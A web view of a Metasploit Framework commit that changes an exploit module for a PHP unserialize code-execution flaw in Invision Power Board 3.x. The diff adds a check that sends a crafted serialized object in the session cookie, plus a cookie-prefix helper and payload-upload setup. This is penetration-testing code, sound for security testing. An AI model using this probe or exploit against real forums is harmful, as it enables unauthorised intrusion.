infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'invision_pboard_cleanup' of git://github.com/jvazquez-r7/metasploit-framework into jvazquez-r7-invision_pboard_cleanup

unstable
sinn3r 2012-11-16 11:24:04 -06:00
parent e8fe6031e9 09ec7dea95
commit 8930d618e3
1 changed files with 31 additions and 34 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

63
modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
View File

@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, },
'Author' => 'Author' =>
[ [
'EgiX', # Vulnerability discovery and PoC 'EgiX', # Vulnerability discovery, PoC, work on check() and cookie_prefix() methods
'juan vazquez', # Metasploit module 'juan vazquez', # Metasploit module
'sinn3r' # PhpEXE tekniq & check() method 'sinn3r' # PhpEXE tekniq & check() method
], ],
@ -69,28 +69,39 @@ class Metasploit3 < Msf::Exploit::Remote
return base return base
end end
def check def cookie_prefix
res = send_request_raw({'uri'=>"#{base}index.php"}) print_status("#{@peer} - Checking for cookie prefix")
return Exploit::CheckCode::Unknown if not res cookie_prefix = ""
res = send_request_cgi(
{
'uri' => "#{base}index.php",
'method' => 'GET'
})
version = res.body.scan(/Community Forum Software by IP\.Board (\d+)\.(\d+).(\d+)/).flatten if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/
return Exploit::CheckCode::Safe if version.empty? print_status("#{@peer} - Cookie prefix #{$1} found")
version = version.map {|e| e.to_i} cookie_prefix = $1
end
# We only want major version 3 return cookie_prefix
# This version checking is based on OSVDB's info
return Exploit::CheckCode::Safe if version[0] != 3
case version[1]
when 1
return Exploit::CheckCode::Vulnerable if version[2].between?(0, 4)
when 2
return Exploit::CheckCode::Vulnerable if version[2].between?(0, 3)
when 3
return Exploit::CheckCode::Vulnerable if version[2].between?(0, 4)
end end
def check
@peer = "#{rhost}:#{rport}"
check_str = Rex::Text.uri_encode('a:1:{i:0;O:1:"x":0:{}}')
res = send_request_cgi(
{
'uri' => "#{base}index.php",
'method' => 'GET',
'cookie' => "#{cookie_prefix}session_id=#{check_str}"
})
if res and res.code == 500 or res.body =~ /PHP_Incomplete_Class/
return Exploit::CheckCode::Vulnerable
elsif res and res.code == 200
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Unknown
end
end end
def on_new_session(client) def on_new_session(client)
@ -110,20 +121,6 @@ class Metasploit3 < Msf::Exploit::Remote
@upload_php = rand_text_alpha(rand(4) + 4) + ".php" @upload_php = rand_text_alpha(rand(4) + 4) + ".php"
@peer = "#{rhost}:#{rport}" @peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Checking for cookie prefix")
res = send_request_cgi(
{
'uri' => "#{base}index.php",
'method' => 'GET'
})
if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/
print_status("#{@peer} - Cookie prefix #{$1} found")
cookie_prefix = $1
else
cookie_prefix = ""
end
# get_write_exec_payload uses a function, which limits our ability to support # get_write_exec_payload uses a function, which limits our ability to support
# Linux payloads, because that requires a space: # Linux payloads, because that requires a space:
# function my_cmd # function my_cmd